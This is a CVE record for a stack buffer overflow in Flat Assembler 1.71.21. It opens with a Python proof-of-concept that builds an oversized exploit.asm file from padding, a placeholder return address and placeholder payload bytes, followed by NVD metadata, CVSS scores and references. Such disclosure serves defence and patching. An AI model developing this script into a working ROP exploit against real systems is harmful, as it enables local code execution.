CVE-2017-20228

#!/usr/bin/env python3 # PoC for CVE-2017-20228 - Flat Assembler Stack Buffer Overflow # Usage: python3 poc.py > exploit.asm && ./fasm exploit.asm import struct # Offset to overwrite EIP (Instruction Pointer) offset = 5895 # Placeholder for a return address (ROP gadget) # Address needs to be adjusted based on the specific environment/version ret_addr = struct.pack('<I', 0xAAAAAAAA) # NOP sled or simple padding padding = b'A' * offset # Simple ROP chain or Shellcode placeholder # In a real exploit, this would contain ROP gadgets to bypass DEP and execute shellcode payload = b'C' * 100 # Construct the malicious input malicious_input = padding + ret_addr + payload # Write to a file that FASM will attempt to compile with open('exploit.asm', 'wb') as f: f.write(malicious_input) print("[+] PoC file 'exploit.asm' generated.") print("[+] Attempting to trigger buffer overflow in Flat Assembler 1.71.21")

{"cve": {"id": "CVE-2017-20228", "sourceIdentifier": "[email protected]", "published": "2026-03-28T12:16:02.200", "lastModified": "2026-04-02T19:20:02.873", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Flat Assembler 1.71.21 contains a stack-based buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying oversized input to the application. Attackers can craft malicious assembly input exceeding 5895 bytes to overwrite the instruction pointer and execute return-oriented programming chains for shell command execution."}, {"lang": "es", "value": "Flat Assembler 1.71.21 contiene una vulnerabilidad de desbordamiento de búfer basado en pila que permite a atacantes locales ejecutar código arbitrario al proporcionar una entrada de tamaño excesivo a la aplicación. Los atacantes pueden crear una entrada de ensamblador maliciosa que exceda los 5895 bytes para sobrescribir el puntero de instrucción y ejecutar cadenas de programación orientada a retorno para la ejecución de comandos de shell."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flatassembler:flat_assembler:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.71.21", "matchCriteriaId": "3DEEC000-D1CF-4598-83AC-866E75E5EF93"}]}]}], "references": [{"url": "http://www.flatassembler.net", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/42265", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/flat-assembler-stack-based-buffer-overflow-rop", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}